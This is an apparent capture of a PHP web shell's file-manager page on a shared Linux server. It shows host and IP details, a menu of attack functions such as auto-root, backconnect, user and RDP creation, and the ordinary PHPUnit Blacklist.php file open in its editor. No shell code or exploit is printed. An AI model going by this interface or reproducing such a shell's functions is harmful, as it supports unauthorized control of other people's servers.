Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
phpunit /
phpunit /
src /
Util /
[ HOME SHELL ]
Name
Size
Permission
Action
Log
[ DIR ]
drwxr-xr-x
PHP
[ DIR ]
drwxr-xr-x
TestDox
[ DIR ]
drwxr-xr-x
Blacklist.php
3.36
KB
-rw-r--r--
Configuration.php
34.07
KB
-rw-r--r--
ConfigurationGenerator.php
1.83
KB
-rw-r--r--
ErrorHandler.php
3.32
KB
-rw-r--r--
Fileloader.php
1.62
KB
-rw-r--r--
Filesystem.php
800
B
-rw-r--r--
Filter.php
2.84
KB
-rw-r--r--
Getopt.php
4.53
KB
-rw-r--r--
GlobalState.php
5.31
KB
-rw-r--r--
InvalidArgumentHelper.php
1.03
KB
-rw-r--r--
PHP.php
10.44
KB
-rw-r--r--
Printer.php
3.32
KB
-rw-r--r--
Regex.php
881
B
-rw-r--r--
String.php
1.36
KB
-rw-r--r--
Test.php
34.59
KB
-rw-r--r--
TestSuiteIterator.php
1.95
KB
-rw-r--r--
Type.php
840
B
-rw-r--r--
XML.php
7.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Blacklist.php
<?php /* * This file is part of PHPUnit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Utility class for blacklisting PHPUnit's own source code files. */ class PHPUnit_Util_Blacklist { /** * @var array */ public static $blacklistedClassNames = [ 'File_Iterator' => 1, 'PHP_Invoker' => 1, 'PHP_Timer' => 1, 'PHP_Token' => 1, 'PHPUnit_Framework_TestCase' => 2, 'PHPUnit_Extensions_Database_TestCase' => 2, 'PHPUnit_Framework_MockObject_Generator' => 2, 'Text_Template' => 1, 'Symfony\Component\Yaml\Yaml' => 1, 'SebastianBergmann\CodeCoverage\CodeCoverage' => 1, 'SebastianBergmann\Diff\Diff' => 1, 'SebastianBergmann\Environment\Runtime' => 1, 'SebastianBergmann\Comparator\Comparator' => 1, 'SebastianBergmann\Exporter\Exporter' => 1, 'SebastianBergmann\GlobalState\Snapshot' => 1, 'SebastianBergmann\RecursionContext\Context' => 1, 'SebastianBergmann\Version' => 1, 'Composer\Autoload\ClassLoader' => 1, 'Doctrine\Instantiator\Instantiator' => 1, 'phpDocumentor\Reflection\DocBlock' => 1, 'Prophecy\Prophet' => 1, 'DeepCopy\DeepCopy' => 1 ]; /** * @var array */ private static $directories; /** * @return array */ public function getBlacklistedDirectories() { $this->initialize(); return self::$directories; } /** * @param string $file * * @return bool */ public function isBlacklisted($file) { if (defined('PHPUNIT_TESTSUITE')) { return false; } $this->initialize(); foreach (self::$directories as $directory) { if (strpos($file, $directory) === 0) { return true; } } return false; } private function initialize() { if (self::$directories === null) { self::$directories = []; foreach (self::$blacklistedClassNames as $className => $parent) { if (!class_exists($className)) { continue; } $reflector = new ReflectionClass($className); $directory = $reflector->getFileName(); for ($i = 0; $i < $parent; $i++) { $directory = dirname($directory); } self::$directories[] = $directory; } // Hide process isolation workaround on Windows. // @see PHPUnit_Util_PHP::factory() // @see PHPUnit_Util_PHP_Windows::process() if (DIRECTORY_SEPARATOR === '\\') { // tempnam() prefix is limited to first 3 chars. // @see http://php.net/manual/en/function.tempnam.php self::$directories[] = sys_get_temp_dir() . '\\PHP'; } } } }
Close